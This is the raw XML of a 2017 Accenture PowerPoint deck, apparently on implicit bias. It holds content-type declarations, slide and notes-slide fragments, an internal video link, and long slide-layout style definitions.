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slides/slide24.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23.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16.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5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide6.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7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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notesSlides/notesSlide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notes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slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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6.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65" r:id="rId3"/>
    <p:sldMasterId id="2147483690" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId29"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId30"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="333" r:id="rId5"/>
    <p:sldId id="339" r:id="rId6"/>
    <p:sldId id="288" r:id="rId7"/>
    <p:sldId id="330" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="336" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="307" r:id="rId12"/>
    <p:sldId id="322" r:id="rId13"/>
    <p:sldId id="323" r:id="rId14"/>
    <p:sldId id="335" r:id="rId15"/>
    <p:sldId id="334" r:id="rId16"/>
    <p:sldId id="337" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="324" r:id="rId20"/>
    <p:sldId id="332" r:id="rId21"/>
    <p:sldId id="290" r:id="rId22"/>
    <p:sldId id="340" r:id="rId23"/>
    <p:sldId id="325" r:id="rId24"/>
    <p:sldId id="327" r:id="rId25"/>
    <p:sldId id="331" r:id="rId26"/>
    <p:sldId id="329" r:id="rId27"/>
    <p:sldId id="33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040" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="2640" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4"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E6E1"/>
    <a:srgbClr val="FFCCCC"/>
    <a:srgbClr val="D8D8D8"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="2800FF"/>
    <a:srgbClr val="00BAFF"/>
    <a:srgbClr val="00FF7D"/>
    <a:srgbClr val="00F3FF"/>
    <a:srgbClr val="FFB600"/>
    <a:srgbClr val="FFEA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5" autoAdjust="0"/>
    <p:restoredTop sz="52324" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="47" d="100"/>
          <a:sy n="47" d="100"/>
        </p:scale>
        <p:origin x="2166" y="48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="5040"/>
        <p:guide pos="2640"/>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50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="2574" y="1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openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.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ustomXml" Target="../customXml/item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customXml" Target="../customXml/item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11/2/2017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11/2/2017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https://mediaexchange.accenture.com/id/1_67i4ux1j – video link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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1</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104664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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2300438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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349982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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86518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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3609459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Implicit bias</a:t>
            </a:r>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="610699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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397629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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3537968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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187079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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2088146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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3198593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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1428764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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3610846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8572500" cy="3086100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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1588">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="339717" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr/>
            </a:lvl8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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8953500" y="266700"/>
            <a:ext cx="2857501" cy="6438900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx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00">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="344479" indent="-173034">
              <a:buFont typeface="Graphik" panose="020B0503030202060203" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" indent="0">
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" indent="0">
              <a:defRPr sz="1400" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>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879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oters Only: Ligh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Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>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110607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oters Only: Dark">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="000088"/>
            </a:gs>
            <a:gs pos="93000">
              <a:schemeClr val="accent1"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000" scaled="0"/>
        </a:gra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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.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48461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Ligh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 y="495302"/>
            <a:ext cx="8953500" cy="6172199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="65000"/>
              </a:lnSpc>
              <a:defRPr sz="12000" b="0" spc="-200" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="65000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="6000" b="0" cap="all" spc="-150" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="4000" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3000" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5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113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ark">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="7000">
              <a:schemeClr val="accent1"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="000088"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000" scaled="0"/>
        </a:gra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 y="495302"/>
            <a:ext cx="8953500" cy="6172199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="65000"/>
              </a:lnSpc>
              <a:defRPr sz="12000" b="0" spc="-200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="65000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="6000" b="0" cap="all" spc="-150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="4000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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7656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ighlight or TakeAway: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10000" spc="-150" baseline="0"/>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defRPr sz="5000" b="0" spc="-150" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="3300" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2500" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" cap="all" baseline="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl7pPr>
              <a:defRPr b="1">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr>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68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ghlight or TakeAway: Dark">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="7000">
              <a:schemeClr val="accent1"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="000088"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="18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571500"/>
            <a:ext cx="8572500" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="10000" spc="-150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>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defRPr sz="5000" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="3300" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2500" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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8000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21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Dark">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="000088"/>
            </a:gs>
            <a:gs pos="93000">
              <a:schemeClr val="accent1"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="18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8686800" cy="3086100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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1588">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="55561" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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9052560" y="266700"/>
            <a:ext cx="2857501" cy="6438900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1400" b="0">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00">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="344479" indent="-173034">
